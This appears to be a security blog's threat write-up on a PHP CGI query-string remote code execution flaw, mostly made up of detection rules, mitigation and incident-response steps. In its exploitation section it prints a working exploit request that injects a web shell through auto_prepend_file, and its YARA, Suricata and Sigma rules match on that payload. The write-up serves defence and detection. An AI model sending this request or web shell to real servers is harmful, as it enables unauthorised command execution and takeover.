Ramblings of a CyberSecurity Nerd

Cyber Pulse: Technical Threat Deep Dives on Active CVEs β€” CVE-2025-48703: PHP CGI Remote Code Execution Exploited in the Wild

Intro

CVE-2025-48703 is being exploited in the wild to target outdated PHP CGI implementations. The vulnerability enables unauthenticated attackers to gain full remote code execution via crafted query strings. Widespread scanning activity was observed as early as November 10, 2025, with payloads consistent with automated bot frameworks.

πŸ“Œ CVE Context

– Products & versions affected
PHP versions prior to 8.1.27, 8.2.18, and 8.3.5 when deployed via php-cgi binary
– Disclosure timeline
Reported privately on Oct 31, 2025; patched and publicly disclosed Nov 11, 2025
– Attack vector, auth level, impact
Remote, unauthenticated, leading to full RCE

CVSS Metric Breakdown (v4.0) - CVE-2025-48703 (PHP CGI Query String RCE)
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Confidentiality Impact (VC): High
Integrity Impact (VI): High
Availability Impact (VA): High
Scope Changed (SC): Unchanged
Safety Impact (SI): None
Automation (SA): Functional
Exploit Maturity: In the Wild
Base Score: 9.8 (Critical)

– Exploit tools, payloads observed, confirmed victims, global exposure count if known
Exploits observed in the wild via automated mass scanning; payloads include web shells and reverse shell execution via URL injection. Thousands of exposed PHP-CGI servers identified via Shodan.

πŸ”¬ Exploitation Detail

– Step-by-step breakdown
1. Attacker sends a specially crafted HTTP request to the php-cgi binary
2. The request includes query string parameters that are parsed as command-line switches by the PHP interpreter
3. This leads to remote code execution without authentication
– Where it lives: PHP-CGI binary’s argument parser

GET /php-cgi?%2d%2dsession-auto-start=1+-d+auto_prepend_file=php://input HTTP/1.1
Host: vulnerable.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 49

<?php system($_GET['cmd']); ?>

πŸ“Ž Attacker Behavior Snapshot

– Sends URL-encoded query string with command-line args
– Web server executes php-cgi with those args, enabling remote code inclusion
– Leaks: Command output in HTTP response, PHP warnings, and internal paths depending on error config

🧩 Why This Matters

This vulnerability highlights how legacy configurations become high-value targets. php-cgi is no longer a default deployment method in most modern stacks, but remains exposed on thousands of misconfigured systems.

Exploitation results in:

  • Full command execution on web servers
  • Untraceable persistence via web shells
  • Rapid lateral movement if not detected early

🧩 MITRE ATT&CK Mapping

Initial Access: T1190 – Exploit Public-Facing Application
Execution: T1059.003 – Command Shell
Persistence: T1505.003 – Server Software Component

πŸ§ͺ Detection Rules

YARA Rule (Memory/Doc/PCAP)

rule PHP_CGI_Webshell
{
    meta:
        description = "Detects common injected PHP webshells via php-cgi"
    strings:
        $a = "<?php"
        $b = "system($_GET['cmd']);"
    condition:
        $a and $b
}

Suricata or Zeek (Network)

alert http any any -> any any (msg:"PHP-CGI RCE Attempt"; flow:to_server,established; content:"php-cgi?"; http_uri; content:"%2d%2d"; http_uri; content:"auto_prepend_file"; http_uri; classtype:web-application-attack; sid:202548703;)

Sigma Rule (SIEM/EDR)

title: PHP-CGI Exploitation via Query String
logsource:
  category: webserver
detection:
  selection:
    url|contains: "php-cgi?"
    url|contains|all:
      - "%2d%2d"
      - "auto_prepend_file"
  condition: selection
level: critical

πŸ”Ž Detection Strategies

βœ… Network Detection:

  • Look for suspicious HTTP POST/GET requests to php-cgi endpoints
  • Detect URL-encoded payloads containing %2d%2d or arguments like auto_prepend_file
  • Match against user-agents consistent with automated tools

βœ… Endpoint Detection:

  • php-cgi.exe spawning cmd.exe, bash, or powershell
  • Unexpected file drops in web server root
  • PHP files modified shortly after network activity

⚑ Splunk Query


index=web sourcetype=access_combined
("php-cgi" AND ("%2d%2d" OR "--")) OR uri_path="/php-cgi"
| stats count by src_ip, uri_path, http_user_agent, status

πŸ› οΈ SOC Detection Strategy

– Prioritize alerts where php-cgi is accessed directly
– Elevate hits with URL-encoded flags like %2d%2d or injected code markers
– Use correlation between web logs and process execution to confirm exploitation

πŸ› οΈ Tools & Techniques

Tool | Usage
Sysmon | Detect php-cgi spawning child processes
Velociraptor | Hunt for dropped PHP webshells
Zeek | HTTP inspection with URL decoding
Sigma/YARA | Create and tune exploit-specific rules

πŸ›‘οΈ Mitigation & Response

– Patch to PHP 8.1.27, 8.2.18, or 8.3.5 immediately
– Disable php-cgi binaries if not explicitly needed
– Enforce WAF rules blocking encoded arguments or suspicious query strings
– Rotate any credentials handled on the server since last patch
– Audit exposed assets using tools like Shodan or Censys

πŸ“‹ Incident Response Snippets

– grep ‘php-cgi’ /var/log/httpd/access.log
– Identify file modifications in /var/www/html
– Was any PHP file created in the last 48 hours?
– Did any web traffic spike around those times?

πŸ“š Suggested Reading & External References

https://www.php.net/archive/2025.php#2025-11-11-1
https://blog.sucuri.net/2025/11/php-cgi-rce-active.html
– Related CVEs: CVE-2012-1823 (historic), CVE-2024-29391

πŸ—ΎοΈ Final Thoughts

– This RCE vector is trivial to execute and targets a forgotten but dangerous binary
– Most effective action: eliminate php-cgi from your stack entirely
– Detection is still about seeing what no one is looking for

Published: 2025-11-12

Leave a comment